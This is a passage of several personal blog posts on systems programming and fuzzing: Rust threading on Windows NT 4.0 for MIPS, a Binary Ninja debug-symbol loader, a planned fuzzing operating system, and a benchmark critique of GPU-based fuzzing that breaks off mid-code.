We then can invoke NtCreateThread() with a stack that we created, point the thread at a simple trampoline and pass in a pointer to the raw backing of the Box. Then, in the trampoline, we can convert the raw pointer back into a Box and invoke it! Now we’ve run the closure in the thread!

Return values

Unfortunately, this only gets us execution of the closure. We still have to add the ability to get return values from the thread. This has a unique design problem that the return value has to be accessible to the thread which created it, while also being accessible to the thread itself to initialize. Since the creator of the thread can also just ignore the result of the thread, we can’t free the return storage if the creator doesn’t want it as the thread won’t know that information (or you’d have to communicate it).

So, we ended up using an Arc<>. This is an atomic reference counted heap allocated structure in Rust, and it ensures that the value lives as long as there is one reference. This works perfectly for this situation, we give one copy of the Arc to the thread (ref count 1), and then another copy to the creator of the thread (ref count 2). This way, the only way the storage for the Arc is freed is if both the thread and creator are done with it.

Further, we need to ensure some level of synchronization with the thread as the creator cannot check this return value of the thread until the thread has initialized it. Luckily, we can accomplish this in two ways. One, when a user join()s on a thread, it blocks until that thread finishes execution. To do this we invoke NtWaitForSingleObject() that takes in a HANDLE, given to us when we created the thread, and a timeout. By setting an infinite timeout we can ensure that we do not do anything until the thread is done.

This leaves some implementation specific details about threads up in the air, like what happens with thread early termination, crashes, etc. Thus, we want to also ensure the return value has been updated in another way.

We did this by being creative with the Arc reference count. The Arc reference count can only be decreased by the thread when the Arc goes out of scope, and due to the way we designed the thread, this can only happen once the value has been successfully initialized.

Thus, in our main thread, we can call Arc::try_unwrap() on our return value, this will only succeed if we are the only reference to the Arc, thus atomically ensuring that the thread has successfully updated the return value!

Now we have full Rust-style threading, ala:

fn main() -> Result<(), ()> {
    let a_local_value = 5;

    let thr = syscall::spawn(move || {
        println!("Hello world from Rust thread {}", a_local_value);
        core::cell::RefCell::new(22)
    }).unwrap();

    println!("Return val: {:?}", thr.join().unwrap());

    Ok(())
}
Serving 23500 bytes to 192.168.1.2:46026
---------------------------------
Hello world from Rust thread 5
Return val: RefCell { value: 22 }

HOW COOL IS THAT!? RIGHT!? This is on MIPS for Windows NT 4.0, an operating system from almost 20 years prior to Rust even existing! We have all the safety and fun features of bounds checking, dynamically growing vectors, scope-based dropping of references, locks, and allocations, etc.

Cleaning it all up

Unfortunately, we have a few leaks. We leak the handle that we got from when we created the thread, and we also leak the stack of the thread itself. This is actually a tough-ish problem. How do we free the stack of a thread when we don’t know when it exits (as the creator of the thread might never join() it).

Well, the first problem is easy. Implement a Handle type, implement a Drop handler on it, and Rust will automatically clean up the handle when it goes out of scope by calling the NtClose() in our Drop handler. Phew, that’s easy.

Freeing the stack is a bit harder, but we decided that the best route would be to have the thread free its own stack. This isn’t too hard, it just means that we must free the stack and exit the thread without touching the stack, ideally without using any globals as that would have race conditions.

Luckily, we can do this just fine if we implement the syscalls we need directly in one assembly block where we know we have full control.

// Region size
let mut rsize = 0usize;

// Free the stack and then exit the thread. We do this in one assembly
// block to ensure we don't touch any stack memory during this stage
// as we are freeing the stack.
unsafe {
    asm!(r#"
        // Set the link register
        jal 2f

        // Exit thread
        jal 3f
        break

    2:
        // NtFreeVirtualMemory()
        li $v0, {free}
        syscall

    3:
        // NtTerminateThread()
        li $v0, {terminate}
        li $a0, -2 // GetCurrentThread()
        li $a1, 0  // exit code
        syscall

    "#, terminate = const Syscall::TerminateThread   as usize,
        free      = const Syscall::FreeVirtualMemory as usize,
        in("$4") !0usize,
        in("$5") addr_of_mut!(stack),
        in("$6") addr_of_mut!(rsize),
        in("$7") MEM_RELEASE, options(noreturn));
}

Interestingly we do technically have to pass a stack variable to NtFreeVirtualMemory() but that’s actually okay as either the kernel updates that variable before freeing the stack, and thus it’s fine, or it updates the variable as an untrusted user pointer after freeing the stack, and returns with an error. We don’t really care either way as the stack is freed. Then, all we have to do is call NtTerminateThread() and we’re all done.

Huzzah, fancy Rust threading, no memory leaks, (hopefully) no race conditions.

/// Spawn a thread
///
/// MIPS specific due to some inline assembly as well as MIPS-specific context
/// structure creation.
pub fn spawn<F, T>(f: F) -> Result<JoinHandle<T>>
        where F: FnOnce() -> T,
              F: Send + 'static,
              T: Send + 'static {
    // Holder for returned client handle
    let mut handle = 0usize;

    // Placeholder for returned client ID
    let mut client_id = [0usize; 2];

    // Create a new context
    let mut context: Context = unsafe { core::mem::zeroed() };

    // Allocate and leak a stack for the thread
    let stack = vec![0u8; 4096].leak();

    // Initial TEB, maybe some stack stuff in here!?
    let initial_teb = [0u32; 5];

    /// External thread entry point
    extern fn entry<F, T>(func:      *mut F,
                          ret:       *mut UnsafeCell<MaybeUninit<T>>,
                          mut stack:  usize) -> !
            where F: FnOnce() -> T,
                  F: Send + 'static,
                  T: Send + 'static {
        // Create a scope so that we drop `Box` and `Arc`
        {
            // Re-box the FFI'd type
            let func: Box<F> = unsafe {
                Box::from_raw(func)
            };

            // Re-box the return type
            let ret: Arc<UnsafeCell<MaybeUninit<T>>> = unsafe {
                Arc::from_raw(ret)
            };

            // Call the closure and save the return
            unsafe { (&mut *ret.get()).write(func()); }
        }

        // Region size
        let mut rsize = 0usize;

        // Free the stack and then exit the thread. We do this in one assembly
        // block to ensure we don't touch any stack memory during this stage
        // as we are freeing the stack.
        unsafe {
            asm!(r#"
                // Set the link register
                jal 2f

                // Exit thread
                jal 3f
                break

            2:
                // NtFreeVirtualMemory()
                li $v0, {free}
                syscall

            3:
                // NtTerminateThread()
                li $v0, {terminate}
                li $a0, -2 // GetCurrentThread()
                li $a1, 0  // exit code
                syscall

            "#, terminate = const Syscall::TerminateThread   as usize,
                free      = const Syscall::FreeVirtualMemory as usize,
                in("$4") !0usize,
                in("$5") addr_of_mut!(stack),
                in("$6") addr_of_mut!(rsize),
                in("$7") MEM_RELEASE, options(noreturn));
        }
    }

    let rbox = unsafe {
        /// Control context
        const CONTEXT_CONTROL: u32 = 1;

        /// Floating point context
        const CONTEXT_FLOATING_POINT: u32 = 2;

        /// Integer context
        const CONTEXT_INTEGER: u32 = 4;

        // Set the flags for the registers we want to control
        context.context.bits64.flags =
            CONTEXT_CONTROL | CONTEXT_FLOATING_POINT | CONTEXT_INTEGER;

        // Thread entry point
        context.context.bits64.fir = entry::<F, T> as usize as u32;

        // Set `$a0` argument
        let cbox: *mut F = Box::into_raw(Box::new(f));
        context.context.bits64.int[4] = cbox as u64;
        
        // Create return storage in `$a1`
        let rbox: Arc<UnsafeCell<MaybeUninit<T>>> =
            Arc::new(UnsafeCell::new(MaybeUninit::uninit()));
        context.context.bits64.int[5] = Arc::into_raw(rbox.clone()) as u64;

        // Pass in stack in `$a2`
        context.context.bits64.int[6] = stack.as_mut_ptr() as u64;

        // Set the 64-bit `$sp` to the end of the stack
        context.context.bits64.int[29] =
            stack.as_mut_ptr() as u64 + stack.len() as u64;
        
        rbox
    };

    // Create the thread
    let status = NtStatus(unsafe {
        syscall8(
            // OUT PHANDLE ThreadHandle
            addr_of_mut!(handle) as usize,

            // IN ACCESS_MASK DesiredAccess
            0x1f03ff,

            // IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL
            0,

            // IN HANDLE ProcessHandle
            !0,

            // OUT PCLIENT_ID ClientId
            addr_of_mut!(client_id) as usize,

            // IN PCONTEXT ThreadContext,
            addr_of!(context) as usize,

            // IN PINITIAL_TEB InitialTeb
            addr_of!(initial_teb) as usize,

            // IN BOOLEAN CreateSuspended
            0,

            // Syscall number
            Syscall::CreateThread as usize
        )
    } as u32);

    // Convert error to Rust error
    if status.success() {
        Ok(JoinHandle(Handle(handle), rbox))
    } else {
        Err(status)
    }
}

Fun oddities

While doing this work it was fun to notice that it seems that threads do not die upon crashing. It would appear that the thread initialization thunk that Windows normally shims in when you create a thread must register some sort of exception handler which then fires and the thread itself reports the information to the kernel. At least in this version of NT, the thread did not die, and the process didn’t crash as a whole.

“Fuzzing” Windows NT

Windows NT 4.0 blue screen of death

Of course, the point of this project was to fuzz Windows NT. Well, it turns out that literally the very first thing we did… randomly invoke a syscall, was all it took.

/// Worker thread for fuzzing
fn worker(id: usize) {
    // Create an RNG
    let rng = Rng::new(0xe06fc2cdf7b80594 + id as u64);

    loop {
        unsafe {
            syscall::syscall0(rng.next() as usize);
        }
    }
}

Yep, that’s all it took.

Debugging Windows NT Blue Screens

Unfortunately, we’re in a pretty legacy system and our tools for debugging are limited. Especially for MIPS executables for Windows. Turns out that Ghidra isn’t able to load MIPS PEs at all, and Binary Ninja has no support for the debug information.

We started by writing a tool that would scrape the symbol output and information from mipskd (which works really similar to modern KD), but unfortunately one of the members of my chat claimed a chat reward to have me drop whatever I was doing and rewrite it in Rust.

At the moment we were writing a hacky batch script to dump symbols in a way we could save to disk, rip out of the VM, and then use in Binary Ninja. However, well, now I had to do this all in Rust.

Parsing DBG COFF

The debug files that ship with Windows NT on the ISO are DI magic-ed files. These are separated debug information with a slightly specialized debug header with COFF symbol information. This format is actually relatively well documented, so writing the parser wasn’t too much effort. Most of the development time was trying to figure out how to correlate source line information to addresses. Ultimately, the only possible method to do this that I found was to use the statefulness of the sequence of debug symbol entries to associate the current file definition (in sequence with debug symbols) with symbols that are described after it.

I don’t know if this is the correct design, as I didn’t find it documented everywhere. It is standardized in a few documents, but these DBG files did not follow that format.

I ultimately wrote coff_nm for this parsing, which simply writes to stdout with the format:

F <addr> <function>
G <addr> <global>
S <addr> <source>:<line>

Binary Ninja

Binary Ninja with Pinball.exe open and symbolized

(Fun fact, yes, you can find PPC, MIPS, and Alpha versions of the Space Cadet Pinball game you know and love)

I wrote a very simple Binary Ninja script that allowed me to import this debug information into the program:

from binaryninja import *
import re, subprocess

def load_dbg_file(bv, function):
    rex = re.compile("^([FGS]) ([0-9a-f]{8}) (.*)$")

    # Prompt for debug file input
    dbg_file = interaction \
        .get_open_filename_input("Debug file",
        "COFF Debug Files (*.dbg *.db_)")

    if dbg_file:
        # Parse the debug file
        output = subprocess.check_output(["dbgparse", dbg_file]).decode()
        for line in output.splitlines():
            (typ, addr, name) = rex.match(line).groups()
            addr = bv.start + int(addr, 16)

            (mangle_typ, mangle_name) = demangle.demangle_ms(bv.arch, name)
            if type(mangle_name) == list:
                mangle_name = "::".join(mangle_name)

            if typ == "F":
                # Function
                bv.create_user_function(addr)
                bv.define_user_symbol(Symbol(SymbolType.FunctionSymbol, addr, mangle_name, raw_name=name))
                if mangle_typ != None:
                    bv.get_function_at(addr).function_type = mangle_typ
            elif typ == "G":
                # Global
                bv.define_user_symbol(Symbol(SymbolType.DataSymbol, addr, mangle_name, raw_name=name))
            elif typ == "S":
                # Sourceline
                bv.set_comment_at(addr, name)

        # Update analysis
        bv.update_analysis()

PluginCommand.register_for_address("Load COFF DBG file", "Load COFF .DBG file from disk", load_dbg_file)

This simply prompts the user for a file, invokes the dbgparse tool, parses the output, and then uses Binary Ninjas demangling to demangle names and extract type information (for mangled names). This script tells Binja what functions we know exist, the names of them, and the typing of them (from mangling information), it also applies symbols for globals, and finally it applies source line information as comments.

Thus, we now have a great environment for reading and reviewing NT code for analyzing the crashes we find with our “fuzzer”!

Conclusion

Well, this has gotten a lot longer than expected, and it’s also 5am so I’m just going to upload this as is, so hopefully it’s not a mess as I’m not reading through it to check for errors. Anyways, I hope you enjoyed this write up the 3 streams so far on this content. It’s been a really fun project, and I hope that you tune into my live streams and watch the next steps unfold!

~Gamozo

FuzzOS

6 December 2020 at 23:11

Summary

We’re going to work on an operating system which is designed specifically for fuzzing! This is going to be a streaming series for most of December which will cover making a new operating system with a strong focus on fuzzing. This means that things like the memory manager, determinism, and scalability will be the most important parts of the OS, and a lot of effort will go into making them super fast!

When

Streaming will start sometime on Thursday, December 10th, probably around 18:00 UTC, but the streams will be at relatively random times on relatively random days. I can’t really commit to specific times!

Streams will likely be 4-5 days a week (probably M-F), and probably 8-12 hours in length. We’ll see, who knows, depends how much fun we have!

Where

You’ll be able to find the streams live on my Twitch Channel, and if you’re unlucky and miss the streams, you’ll be able to find the recordings on my YouTube Channel! Don’t forget to like, comment, and subscribe, of course.

What

So… ultimately, I don’t really know what all will happen. But, I can predict a handful of things that we’ll do. First of all, it’s important to note that these streams are not training material. There is no prepared script, materials, flow, etc. If we end up building something totally different, that’s fine and we’re just going with the flow. There is no requirement of completing this project, or committing to certain ways the project will be done. So… with that aside.

We’ll be working on making an operating system, specifically for x86-64 (Intel flavor processors at the start, but AMD should work in non-hypervisor mode). This operating system will be designed for fuzzing, which means we’ll want to focus on making virtual memory management extremely fast. This is the backbone of most performant fuzzing, and we’ll need to be able to map in, unmap, and restore pages as they are modified by a fuzz case.

To keep you on the edge of your toes, I’ll first start with the boring things that we have to do.

OS

We have to make an operating system which boots. We’re gonna make a UEFI kernel, and we might dabble in running it on ARM64 as most of our code will be platform agnostic. But, who knows. It’ll be a pretty generic kernel, I’m mainly going to develop it on bare metal, but of course, we’ll make sure it runs on KVM/Xen/Hyper-V such that it can be used in a cloud environment.

ACPI

We’re gonna need to write ACPI table parsers such that we can find the NUMA locality of memory and CPUs on the system. This will be critical to getting a high performance memory manager that scales with cores.

Multi-processing

Of course, the kernel will support multiple cores, as otherwise it’s kinda useless for compute.

10gbit networking + TCP stack

Since I never work with disks, I’m going to follow my standard model of just using the network as general purpose whatever. To do this, we’ll need 10gbit network drivers and a TCP stack such that we can communicate with the rest of a network. Nothing too crazy here, we’ll probably borrow some code from Chocolate Milk


Interesting stuff

Okay, that stuff was boring, lets talk about the fun parts!

Exotic memory model

Since we’ll be “snapshotting” memory itself, we need to make sure things like pointers aren’t a problem. The fastest, easiest, and best solution to this, is simply to make sure the memory always gets loaded at the same address. This is no problem for a single core, but it’s difficult for multiple cores, as they need to have copies of the same data mapped at the same location.

What’s the solution? Well of course, we’ll have every single core on the system running it’s own address space. This means there is no shared memory between cores (with some very, very minor execeptions). Not only does this lead to execeptionally high memory access performance (due to caches only being in the exclusive or shared states), but it also means that shared (mutable) memory will not be a thing! This means that we’ll do all of our core synchronization through message passing, which is higher latency in the best case than shared memory models, but with an advantage of scaling much better. As long as our messages can be serialized to TCP streams, that means we can scale across the network without any effort.

This has some awesome properties since we no longer need any locks to our page tables to add and remove entries, nor do we need to perform any TLB shootdowns, which can cost tens thousands of cycles.

I used this model in Sushi Roll, and I really miss it. It had incredibly good performance properties and forced a bit more thought about sharing information between cores.

Scaling

As with most things I write, linear scaling will be required, and scaling across the network is just implied, as it’s required for really any realistic application of fuzzing.

Fast and differential memory snapshotting

So far, none of these things are super interesting. I’ve had many OSes that do these things well, for fuzzing, for quite a long time. However, I’ve never made these memory management techniques into a true data structure, rather I use them as needed manually. I plan to make the core of this operating system, a combination of Rust procedural macros and virtual memory management tricks to allow for arbitrary data structure to be stored in a tree-shaped checkpointed structure.

This will allow for fast transitions between different state of the structure as they were snapshotted. This will be done by leveraging the dirty bits in the page tables, and creating an allocator that will allocate in a pool of memory which will be saved and restored on snapshots. This memory will be treated as an opaque blob internally, and thus it can hold any information you want, device state, guest memory state, register state, something completely unrelated to fuzzing, won’t matter. To handle nested structures (or more specifically, pointers in structures which are to be tracked), we’ll use a Rust procedural macro to disallow untracked pointers within tracked structures.

Effectively, we’re going to heavily leverage the hardware’s MMU to differentally snapshot, teleport between, and restore blobs of memory. For fuzzing, this is necessary as a way to hold guest memory state and register state. By treating this opaquely, we can focus on doing the MMU aspects really well, and stop worrying about special casing all these variables that need to be restored upon resets.

Linux emulator

Okay, so all of that is kinda to make room for developing high performance fuzzers. In my case, I want this mainly for a new rewrite of vectorized emulation, but to make it interesting for others, we’re going to implement a Linux emulator capable of running QEMU.

This means that we’ll be able to (probably staticially only) compile QEMU. Then we can take this binary, and load it into our OS and run QEMU in our OS. This means we can control the syscall responses to the requests QEMU makes. If we do this deterministically (we will), this means QEMU will be deterministic. Which thus means, the guest inside of QEMU will also be deterministic. You see? This is a technique I’ve used in the past, and works exceptionally well. We’ll definitely outperform Linux’s handling of syscalls, and we’ll scale better, and we’ll blow Linux away when it comes to memory management.

KVM emulator + hypervisor

So, I have no idea how hard this would be, but from about 5 minutes of skimming the interwebs, it seems that I could pretty easily write a hypervisor in my OS that emulates KVM ioctls. Meaning QEMU would just think KVM is there, and use it!

This will give us full control of QEMU’s determinism, syscalls, performance, and reset speeds… without actually having to modify QEMU code.

That’s it

So that’s the plan. An OS + fast MMU code + hypervisor + Linux emulator, to allow us to deterministically run anything QEMU can run, which is effectively everything. We’ll do this with performance likely into the millions of VM resets per second per core, scaling linearly with cores, including over the network, to allow some of the fastest general purpose fuzzing the world has ever seen :D

FAQ

Some people have asked questions on the internet, and I’ll post them here:

Hackernews Q1

Q:

Huh. So my initial response was, "why on earth would you need a whole OS for that", but memory snapshotting and improved virtual memory performance might actually be a good justification. Linux does have CRIU which might be made to work for such a purpose, but I could see a reasonable person preferring to do it from a clean slate. On the other hand, if you need qemu to run applications (which I'm really unclear about; I can't tell if the plan is to run stuff natively on this OS or just to provide enough system to run qemu and then run apps on linux on qemu) then I'm surprised that it's not easier to just make qemu do what you want (again, I'm pretty sure qemu already has its own memory snapshotting features to build on).

Of course, writing an OS can be its own reward, too:) 

A:

Oooh, wasn't really expecting this to make it to HN cause it was meant to be more of an announcement than a description.

But yes, I've done about 7 or 8 operating systems for fuzzing in the past and it's a massive performance (and cleanliness) cleanup. This one is going to be like an operating system I wrote 2-3 years ago for my vectorized emulation work.

To answer your QEMU questions, the goal is to effectively build QEMU with MUSL (just to make it static so I don't need a dynamic loader), and modify MUSL to turn all syscalls to `call` instructions. This means a "syscall" is just a call to another area, which will by my Rust Linux emulator. I'll implement the bare minimum syscalls (and enum variants to those syscalls) to get QEMU to work, nothing more. The goal is not to run Linux applications, but run a QEMU+MUSL combination which may be modified lightly if it means a lower emulation burden (eg. getting rid of threading in QEMU [if possible] so we can avoid fork())

The main point of this isn't performance, it's determinism, but that is a side effect. A normal syscall instruction involves a context switch to the kernel, potentially cr3 swaps depending on CPU mitigation configuration, and the same to return back. This can easily be hundreds of cycles. A `call` instruction to something that handles the syscall is on the order of 1-4 cycles.

While for syscalls this isn't a huge deal, it's even more emphasized when it comes to KVM hypercalls. Transitions to a hypervisor are very expensive, and in this case, the kernel, the hypervisor, and QEMU (eg. device emulation) will all be running at the same privilege level and there won't be a weird QEMU -> OS -> KVM -> other guest OS device -> KVM -> OS -> QEMU transition every device interaction.

But then again, it's mainly for determinism. By emulating Linux deterministically (eg. not providing entropy through times or other syscall returns), we can ensure that QEMU has no source of external entropy, and thus, will always do the same thing. Even if it uses a random-seeded hash table, the seed would be derived from syscalls, and thus, will be the same every time. This determinism means the guest always will do the same thing, to the instruction. Interrupts happen on the same instructions, context switches do, etc. This means any bug, regardless of how complex, will reproduce every time.

All of this syscall emulation + determinism I have also done before, in a tool called tkofuzz that I wrote for Microsoft. That used Linux emulation + Bochs, and it was written in userspace. This has proven incredibly successful and it's what most researchers are using at Microsoft now. That being said, Bochs is about 100x slower than native execution, and now that people have gotten a good hold of snapshot fuzzing (there's a steep learning curve), it's time to get a more performant implementation. With QEMU with get this with a JIT, which at least gets us a 2-5x improvement over Bochs while still "emulating", but even more value could be found if we get the KVM emulation working and can use a hypervisior. That being said, I do plan to support a "mode" where guests which do not touch devices (or more specifically, snapshots which are taken after device I/O has occurred) will be able to run without QEMU at all. We're really only using QEMU for device emulation + interrupt control, thus, if you take a snapshot to a function that just parses everything in one thread, without process IPC or device access (it's rare, when you "read" from a disk, you're likely just hitting OS RAM caches, and thus not devices), we can cut out all the "bloat" of QEMU and run in a very very thin hypervisor instead.

In fuzzing it's critical to have ways to quickly map and unmap memory as most fuzz cases last for hundreds of microseconds. This means after a few hundred microseconds, I want to restore all memory back to the state "before I handled user input" and continue again. This is extremely slow in every conventional operating system, and there's really no way around it. It's of course possible to make a driver or use CRIU, but these are still not exactly the solution that is needed here. I'd rather just make an OS that trivially runs in KVM/Hyper-V/Xen, and thus can run in a VM to get the cross-platform support, rather than writing a driver for every OS I plan to use this on.

Stay cute, ~gamozo 

Social

I’ve been streaming a lot more regularly on my Twitch! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!

Some thoughts on ToB’s GPU-based fuzzing

23 October 2020 at 07:11

The blog

The blog we’re looking at today is an incredible blog by Ryan Eberhardt on the Trail of Bits blog! You should read it first, it’s really neat, there’s also some awesome graphics in it which makes it a super fun read!

Let’s build a high-performance fuzzer with GPUs!

Summary

In the ToB blog, they talk about using GPUs to fuzz. More specifically, they talk about lifting a target architecture into LLVM IR, and then emitting the LLVM IR to a binary which can run on a GPU. In this case, they’re targeting PTX assembly to run on the NVIDIA Tesla T4 GPU. This is done using a tool ToB has been working on for quite a while, called remill, which is designed for binary translation. Remill alone is incredibly impressive.

The target they picked as a benchmark is the BFP packet filtering code in libpcap, pcap_filter_with_aux_data. This function is pretty simple, and it executes a compiled BPF filter and uses it to extract information and filter a packet.

The blog talks about some of the hurdles in getting performant execution on GPUs, organization of data, handing virtual memory, etc. Once again, go read it. It’s really neat, the graphics alone make it a worthwhile read!

I’m super excited about this blog, mainly because it’s very similar to vectorized emulation that I’ve worked on in the past, and it starts answering questions about GPU-based fuzzing that I have been too lazy to look into. While this blog goes into some criticisms, it’s important to note that the research is only just starting, there is much progress to be had! It’s also important to note that this research has been being done by Ryan for only 2 months. That is incredible progress.


The Problems

Nevertheless, I have a few problems with the blog that stood out to me. I’m kind of always the asshole pointing these things out, but I think there are some important things to discuss.

The comparison

In the blog, the comparison being done and being presented is largely about comparing the performance of libfuzzer, against their GPU based fuzzer. Further, the comparisons are largely about the number of executions per second (or as I call them, fuzz cases per second), per unit US dollar. This comparison is largely to emphasize the cost efficiencies of fuzzing on the GPU, so we’ll keep that in mind. We don’t want to stray too far from their actual point.

Their hardware they’re testing on are 2 different Google Cloud Compute nodes which have various specs. The one used to benchmark libfuzzer is an n1-standard-8, this is a 4 core, 8 hyperthread, Intel Skylake machine. This costs $0.38/hour according to their blog, and of course, this checks out.

The other machine they’re testing on, for their GPU metrics, is a NVIDIA Tesla T4 single GPU compute node from Google Cloud Project. They claim this costs $0.35/hour, and once again, that’s accurate. This means the two machines are effectively the same price, and we’ll be able to compare them at a rough level without really taking into consideration their costs.

In their blog, they mention that “This isn’t an entirely fair comparison.”, and this is largely referring to that their fuzzer is not providing mutated inputs to the function, whereas libfuzzer is. This is a major issue. However, their fuzzer is resetting the state of the target every fuzz case, and libfuzzer is relying on the function not having any peristant state that needs to be reset. This gives libfuzzer a large advantage. Finally, the GPU based fuzzer also works on binaries, where libfuzzer requires source, so once again, there’s a lot of variables at play here. It is important to note, they’re mainly looking for order-of-magnitude estimates. But… this is a lot more than should be controlled for in my opinion. Important to also note that the blog concludes with a ~4x improvement from libfuzzer, thus, it’s well below the order-of-magnitude concerns of unfairness.

Of course, if you’ve read my blogs before. You’ll know I absolutely hate comparisons between problems with multiple variables. First of all, the cost of mutating an input is incredibly expensive, especially for a potentially large packet, say 1500 bytes. Further, the target which is being picked is a single function which does very little processing from first glance, but we’ll look into this more later.

So, let’s start off by eliminating one variable right away. What is the cost of generating an input from libfuzzer, and what is the cost of the actual function under test. This will effectively tell us how “fair” the execution comparison is, the binary vs source is subjective and clearly the binary-based engine is more impressive.

How do we do this? Well, let’s first figure out how fast libfuzzer can execute something that does literally nothing. This will give us a baseline of libfuzzer performance given it’s targeting something that does literally nothing.

#include <stdlib.h>
#include <stdint.h>

extern int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
  return 0;  // Non-zero return values are reserved for future use.
}
clang-12 -fsanitize=fuzzer -O2 test.c

We’ll run this test on a Intel(R) Xeon(R) Gold 6252N CPU @ 2.30GHz turboing to 3.6 GHz. This isn’t the same as their GCP setup, but we’ll do some of our own comparisons locally, thus we’re talking about relatives and not absolutes.

They don’t talk much in their blog about what they used to seed libfuzzer, so we’ll just give it no seeds and cap the input size to 1500 bytes, or about a single MTU for a network packet.

pleb@grizzly:~/libpcap/harness$ ./a.out -max_len=1500
INFO: Running with entropic power schedule (0xFF, 100).
INFO: Seed: 2252408900
INFO: Loaded 1 modules   (1 inline 8-bit counters): 1 [0x4ea0b0, 0x4ea0b1), 
INFO: Loaded 1 PC tables (1 PCs): 1 [0x4c0840,0x4c0850), 
INFO: A corpus is not provided, starting from an empty corpus
#2      INITED cov: 1 ft: 1 corp: 1/1b exec/s: 0 rss: 27Mb
#8388608        pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 4194304 rss: 28Mb
#16777216       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3355443 rss: 28Mb
#33554432       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3050402 rss: 28Mb
#67108864       pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3195660 rss: 28Mb
#134217728      pulse  cov: 1 ft: 1 corp: 1/1b lim: 1500 exec/s: 3121342 rss: 28Mb

Hmm, it seems it has settled in at about 3.12 million executions per second on a single core. Hmm, that seems a bit fast compared to the 1.9 million executions per second they see on their 8 thread machine in GCP, but maybe the target is really that complex and slows down performance.

Next, lets see how expensive the target code is outside of libfuzzer.

use std::time::Instant;
use pcap_sys::*;

#[link(name = "pcap")]
extern {
    fn bpf_filter_with_aux_data(
        pc: *const bpf_insn,
        p:  *const u8,
        wirelen: u32,
        buflen:  u32,
        aux_data: *const u8,
    );
}

fn main() {
    const ITERS: u64 = 100_000_000;

    unsafe {
        let mut program: bpf_program = std::mem::zeroed();

        // Ethernet linktype + 1500 snapshot length
        let pcap = pcap_open_dead(1, 1500);
        assert!(!pcap.is_null());

        // Compile the program
        let status = pcap_compile(pcap, &mut program,
            "dst host 1.2.3.4 or tcp or udp or ip or ip6 or arp or rarp or \
            atalk or aarp or decnet or iso or stp or ipx\0"
            .as_ptr() as *const _,
            1, PCAP_NETMASK_UNKNOWN);
        assert!(status == 0, "Failed to compile pcap thingy");

        let buf = vec![0u8; 1500];

        let time = Instant::now();
        for _ in 0..ITERS {
            // Filter a packet
            bpf_filter_with_aux_data(
                program.bf_insns,
                buf.as_ptr(),
                buf.len() as u32,
                buf.len() as u32,
                std::ptr::null()
            );
        }
        let elapsed = time.elapsed().as_secs_f64();

        print!("{:14.2} packets/second\n", ITERS as f64 / elapsed);
    }
}

We’re just going to compile the filter they mention in their blog, and then call bpf_filter_with_aux_data in a loop, applying the filter, and then we’ll print the number of iterations per second that we can do. In my specific case, I’m using libpcap-1.9.1 as distributed as a source code zip, this may differ slightly from their version.

pleb@grizzly:~/libpcap/harness$ RUSTFLAGS="-L../libpcap-1.9.1" cargo run --release
    Finished release [optimized] target(s) in 0.01s
     Running `target/release/harness`
   18703628.46 packets/second

Uh oh, that’s a bit concerning. The target can be executed about 18.7 million times per second, however libfuzzer is capped at pretty much a maximum of 3.1 million executions a second. This means the overhead of libfuzzer, which is not part of this comparison, is a factor of about 6. This means that libfuzzer is given about a 6x penalty, compared to the GPU fuzzer, which immediately gets rid of the ~4.4x advantage that the GPU fuzzer had over libfuzzer in their blog.

This unfortunately, was exactly as I expected. For a target this small, the overhead of creating an input greatly exceeds the cost of the target execution itself. This, unfortunately, makes the comparison against libfuzzer pretty much invalid in my eyes.

Trying to make the comparison closer

I’m lucky in that I have many binary-based snapshot fuzzers sitting around. It’s kind of my specialty. It’s important to note, from this point on, this comparison is for myself. It’s not to critique the blog, it’s simply for me to explore my performance against ToB’s GPU performance. I don’t care which one is better, this is largely for me to figure out if I personally want to start investing some time and money into GPU based fuzzing.

So, to start off, I’m going to compare the GPU fuzzer against my vectorized emulation. Vectorized emulation is a technique that I use to execute multiple VMs in parallel using AVX-512. In this specific case, I’m targeting a RISC-V processor (rv64ima) which will be emulated on my Intel machines by using AVX-512. Since 512 bits / 64 bits is 8, that means I’m running 8 VMs per hardware thread.

Vectorized emulation entirely contains only my own code. I wrote the lifters, the IL, the optimization passes, the JITs, the assemblers, the APIs, everything. This gives me a massive amount of control over adapting it to various targets, and make rapid changes to internals when needed. But, it also means, my code generation should be significantly worse than something like LLVM, as I do only the most basic optimizations (DCE, deduplication, etc). I don’t do any reordering, loop unrolling, memory access elision, etc.

Let’s try it!

The environment

To try to get as close to comparing against ToB’s GPU fuzzer, I’m going to fuzz a binary target and provide no mutation of the inputs. I’m simply going to use a 1500-byte buffer containing zeros. Unfortunately, there’s no specifics about what they used as an input, so we’re making the assumption that a 1500-byte zeroed out input and simply invoking bpf_filter_with_aux_data, waiting for it to return, then resetting VM memory back to the original state and running again is fair. Due to how many or conditions are used in the filter, and given the packet doesn’t match any, should mean we’re seeing the worst case performance (eg. evaluating all expressions). I’m not perfectly familiar with BPF filtering, but I’d imagine there’s an early exit on a match, and thus if the destination was 1.2.3.4, I’d suspect the performance would be improved. Without this being clarified from the ToB blog, we’re just going with worst case (unless I’m incorrect in my understanding of BPF filters, maybe there’s no early exit).

Anyways, the target code that I’m using is as such:

use std::time::Instant;
use pcap_sys::*;

#[link(name = "pcap")]
extern {
    fn bpf_filter_with_aux_data(
        pc: *const bpf_insn,
        p:  *const u8,
        wirelen: u32,
        buflen:  u32,
        aux_data: *const u8,
    );
}

#[no_mangle]
pub extern fn fuzz_external() {
    const ITERS: u64 = 1;

    unsafe {
        let mut program: bpf_program = std::mem::zeroed();

        // Ethernet linktype + 1500 snapshot length
        let pcap = pcap_open_dead(1, 1500);
        assert!(!pcap.is_null());

        // Compile the program
        let status = pcap_compile(pcap, &mut program,
            "dst host 1.2.3.4 or tcp or udp or ip or ip6 or arp or rarp or \
            atalk or aarp or decnet or iso or stp or ipx\0"
            .as_ptr() as *const _,
            1, PCAP_NETMASK_UNKNOWN);
        assert!(status == 0, "Failed to compile pcap thingy");

        let buf = vec![0x41u8; 1500];

		// Filter a packet
		bpf_filter_with_aux_data(
			program.bf_insns,
